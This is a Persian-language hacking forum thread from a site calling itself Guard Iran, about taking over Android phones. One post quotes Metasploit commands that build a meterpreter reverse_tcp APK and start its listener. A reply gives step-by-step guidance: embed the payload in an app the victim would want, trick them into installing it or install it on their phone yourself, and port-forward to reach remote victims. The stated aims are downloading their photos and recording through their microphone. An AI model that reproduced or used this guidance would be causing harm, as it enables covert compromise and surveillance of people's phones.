رفتن به مطلب
  • Black
  • Blueberry
  • Slate
  • Blackcurrant
  • Watermelon
  • Strawberry
  • Orange
  • Banana
  • Apple
  • Emerald
  • Chocolate
  • Charcoal

عضویت ویژه طلایی گارد ایران با تخفیف 50%

برای عضویت کلیک کنید

Recommended Posts

در در 1394/08/18, 13:45:15، tieun گفته است :

درود

دوستان تا اونجا که من هم اطلاع دارم هک اندروید با متااسپلویت کالی دقیقا فقط برای دیوایس هایی هستند که بصورت مشترک به یه وای فا یا وای فا شما وصلند

اگه اشتباه نکنم خوده مدیر بازنشسته demon عزیز هم اموزش داده بودند و منم در یه سایتی اموزششو خونده بودم

حالا بازم شاید من اشتباه میکنم با عرض پوزش از اساتید محترم

نخیر دوست عزیز کسایی ک به وای فای شما هم وصل نباشن رو میتونین بهش نفوذ کنین حتی اونایی ک بستهای همراه هم دارن

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در در 1394/08/17, 17:57:54، aliakbar1378121 گفته است :

سلام

این کد رو منوتو هر سایتی دیدم یا تو یوتیوب دیدم برای هک اندروید بود

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 R >a.apk

و برای دریافتش 

msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 E

این کد تو همه بودش

اما مشکلی که من دارم اینه که با این برنامه که ساخته میشه فقط کسایی که به وایفای من وصلن رو میشه هک کرد

من هر راهی امتحان کردم نشدش کسایی که به وای فای من وصل نیستن و از من دور هستند رو هک کنم

لطفا یه کمکی کنید. سر ابرو هستش.خخخخخخخخ

سلام. امیدوارم معنای امنیت رو در حقیقت خود کلمه حس کنید.

برای اینکه بتونید چنین کاری بکنید هم از payload پیوست استفاده کنید.

بعد اینم در نظر بگیرید که هک هر قربانی تا حدودی نیاز به مهندس اجتماعی هم داره. شما رفتار کاربر رو بسنجید و ببینید اهل چه نرم افزارهایی هستش. ببین از چه نرم افزاری خوشش میاد؟ شاید از آشپزی خوشش اومد شایدم از کیف پول و یا شاید نرم افزار محاسبه متراژ متر مربع. (سعی کن یه برنامه پولی که مطمئنی رو گوشیش نصب نکرده رو پیدا کنی)

از اونجا که از اسم فایل معلوم هست (apk-embed-payload) یعنی اینکه برنامه میاد payload رو با خودش حمل میکنه ، signature نرم افزار تغییر میکنه. کاربر به راحتی نمیتونه signature نرم افزار رو شناسایی کنه مگر اینکه نسخه جدید برنامه رو بگیره و توی نصب دچار مشکل بشه.

حالا بعد از اینکه payload رو به نرم افزار تزریق کردی (که مطمئنا فیلم آموزشیش گیرت میاد) فایل رو آماده ارسال بکن و بگو که خیلی برنامه خوبیه و اینا.

از این به بعد موقعیت قربانی مهمه. اگر با هم توی یه شبکه هستین (مثل وای فای خونه و یا یه جایی که به یه مودم وصل بشید خیلی خوبه)  ولی اگر از راه دور باشه با محدودیت مواجه هستی. فرض میکنیم توی یه شبکه هستین. در زمان تعریف LHOST آی پی خودت رو بده. فایل رو بساز. متااسپلویت رو بیار بالا. exploit رو اجرا کن، مشخصات ای پی و پورت خودت رو بهش بده و استارت کن تا اکسپلویت بره روی حالت Listen و منتظر اتصال باشه...

به اینجا که رسیدی برنامه رو برای قربانی به هر شکلی شده بفرست و سعی کن نصبش بکنه. یا گولش بزن یا خودت نصب کن. وقتی که نصب کرد خود payload به ای پی تعریف شده وصل میشه و تو دیگه گوشی تو دستته. دیگه میتونی عکساشو یکی یکی دانلود کنی و یا اینکه به میکروفونش بگی فلان ثانیه صدا ضبط کنه یا ...

حالا فرض میکنیم طرف توی نت شما نیست. اینجا تو باید اون دستگاه رو از طریق Ip valid وصل کنی به سیستم خودت. خب چجوری؟ این نیاز به port forward داره. اگر پورت توی payload رو مثلا 4444 معرفی کردی، به مودم هم باید بگی که در صورت ورود هرگونه درخواست برای پورت 4444، بفرستش پیش من. ضمنا برای وارد کردن ای پی باید از جایی که نت میگیری باید بهشون بگی برات آی پی ولید وصل کنن تا مستقیم وصل شه به مودمت. فکر کنم هر سه ماه 6000 تومن باشه. اینطوریه که موبایل با ای پی xxx.xxx.xxx.xxx میتونه به آی پی شما به آدرس xxx.xxx.xxx.xxx اطلاعات بفرسته و مستقیم برسه به مودمت و از اونجا مستقیم بیاد برای سیستم.

 

موفق باشی.

a62d106b55562cc1ab88-0b9cf04487a6b1f360f63e4cf1fecec64d429624.zip

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

درباره ی ما

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.
×